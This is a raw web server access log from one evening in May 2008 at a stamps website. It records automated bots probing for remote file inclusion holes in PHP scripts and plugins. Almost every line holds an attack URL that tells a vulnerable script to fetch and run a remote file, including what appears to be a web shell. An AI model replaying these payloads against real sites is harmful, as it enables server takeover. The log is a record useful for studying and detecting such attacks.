83.19.144.26 - - [11/May/2008:17:52:37 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:17:52:41 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
69.90.72.88 - - [11/May/2008:17:53:42 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
64.22.89.194 - - [11/May/2008:17:53:53 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:17:54:40 -0700] "GET /logs/access_080505.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:17:54:41 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:17:54:42 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
85.17.138.13 - - [11/May/2008:17:55:34 -0700] "GET //config/dbutil.bck.php?confdir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.mathstamps.com"
85.17.138.13 - - [11/May/2008:17:55:36 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.mathstamps.com"
69.90.72.88 - - [11/May/2008:17:57:04 -0700] "GET /logs/access_080505.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.90.72.88 - - [11/May/2008:17:57:04 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
160.99.12.231 - - [11/May/2008:17:57:12 -0700] "GET //config.inc.php?path_escape=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.mathstamps.com"
160.99.12.231 - - [11/May/2008:17:57:13 -0700] "GET /logs//config.inc.php?path_escape=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:17:57:45 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:17:57:46 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:17:57:46 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:17:57:59 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:17:57:59 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:17:57:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:17:59:44 -0700] "GET //config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
160.99.12.231 - - [11/May/2008:18:00:05 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.mathstamps.com"
160.99.12.231 - - [11/May/2008:18:00:06 -0700] "GET //config/dbutil.bck.php?confdir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.mathstamps.com"
200.195.11.193 - - [11/May/2008:18:01:26 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.195.11.193 - - [11/May/2008:18:01:26 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.195.11.193 - - [11/May/2008:18:01:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
87.106.51.184 - - [11/May/2008:18:02:09 -0700] "GET /logs/access_080324.log//admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.51.184 - - [11/May/2008:18:02:09 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.51.184 - - [11/May/2008:18:02:10 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
84.19.176.158 - - [11/May/2008:18:02:22 -0700] "GET //config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
69.90.72.88 - - [11/May/2008:18:02:30 -0700] "GET /logs/access_080407.log//skin/zero_vote/ask_password.php?dir=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
69.90.72.88 - - [11/May/2008:18:02:30 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://cocreation.hk/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:18:02:50 -0700] "GET /logs/access_080421.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
87.106.51.184 - - [11/May/2008:18:03:02 -0700] "GET /logs/access_080317.log//admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:18:03:57 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:18:03:57 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:18:03:57 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:18:04:12 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:18:04:12 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:18:04:12 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:18:04:56 -0700] "GET /logs/access_080421.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:18:05:11 -0700] "GET /logs/access_080421.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
211.172.232.90 - - [11/May/2008:18:05:22 -0700] "GET /logs/access_080317.log//admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
211.172.232.90 - - [11/May/2008:18:05:22 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
211.172.232.90 - - [11/May/2008:18:05:24 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.195.11.193 - - [11/May/2008:18:06:06 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.195.11.193 - - [11/May/2008:18:06:06 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
200.195.11.193 - - [11/May/2008:18:06:07 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
211.172.232.90 - - [11/May/2008:18:07:40 -0700] "GET /logs/access_080331.log//admin.cropcanvas.php?cropimagedir=http://nairalanders.110mb.com/fuckrox-id%5B1%5D.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:18:07:45 -0700] "GET /logs/access_080407.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:18:07:45 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
200.195.11.193 - - [11/May/2008:18:07:46 -0700] "GET /logs/access_080421.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:18:07:46 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:18:08:02 -0700] "GET /logs/access_080407.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:18:08:02 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.53.137.18 - - [11/May/2008:18:08:39 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://blackcrew.biz/dur.haka?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:08:45 -0700] "GET /logs/access.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:09:52 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:09:55 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:09:58 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
213.246.51.45 - - [11/May/2008:18:10:32 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:12:01 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:12:04 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:12:08 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:12:39 -0700] "GET /logs/access_080421.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:12:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:12:40 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
216.7.32.9 - - [11/May/2008:18:12:50 -0700] "GET /index2.php?inject%20http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
216.7.32.9 - - [11/May/2008:18:12:51 -0700] "GET /logs/index2.php?inject%20http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:13:29 -0700] "GET /logs/access_080421.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:13:30 -0700] "GET //skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:13:30 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.246.51.45 - - [11/May/2008:18:13:37 -0700] "GET /logs/access_080505.log/joomla/index.php?option=com_restaurante&task=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.246.51.45 - - [11/May/2008:18:13:37 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
213.246.51.45 - - [11/May/2008:18:13:41 -0700] "GET /logs/access_080421.log/joomla/index.php?option=com_restaurante&task=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.75.145.146 - - [11/May/2008:18:13:52 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.conex.auto.pl/sklep/images/werererer.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:15:24 -0700] "GET /logs/access_080505.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:18:16:01 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:18:16:07 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
72.34.226.62 - - [11/May/2008:18:16:07 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
83.19.144.26 - - [11/May/2008:18:16:10 -0700] "GET /logs/access_080421.log//skin/zero_vote/ask_password.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
205.234.213.67 - - [11/May/2008:18:16:14 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
205.234.213.67 - - [11/May/2008:18:16:14 -0700] "GET //ashnews.php?pathtoashnews=http://www.piterx.xpg.com.br/r57.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.53.240.146 - - [11/May/2008:18:16:45 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
145.100.60.18 - - [11/May/2008:18:18:15 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
145.100.60.18 - - [11/May/2008:18:18:16 -0700] "GET //config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
145.100.60.18 - - [11/May/2008:18:18:16 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://elveon.tripod.com/news/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.232.68.17 - - [11/May/2008:18:18:20 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:18:18:47 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:18:18:49 -0700] "GET //config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
62.75.184.206 - - [11/May/2008:18:18:49 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.raybrothers.org/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:18:57 -0700] "GET /logs/access_080407.log//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:18:57 -0700] "GET //skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
59.22.140.17 - - [11/May/2008:18:18:58 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://www.raidho.com.br/design/templates/arearest/ids/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:19:46 -0700] "GET /logs/access_080324.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:19:46 -0700] "GET /logs/access_080324.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:19:47 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:19:47 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:19:48 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:19:48 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:19:49 -0700] "GET /logs/access_080324.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:19:50 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:19:51 -0700] "GET /logs//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:20:35 -0700] "GET /logs/access_080317.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:20:43 -0700] "GET /logs/access_080317.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:21:05 -0700] "GET /logs/access_080317.log//admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:21:16 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:21:16 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
207.58.179.218 - - [11/May/2008:18:21:19 -0700] "GET //admin.cropcanvas.php?cropimagedir=http://hyunam.hanbat.ac.kr:8005/~mg961010/bbs/data/pds/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
84.19.176.158 - - [11/May/2008:18:23:15 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
84.19.176.158 - - [11/May/2008:18:23:15 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
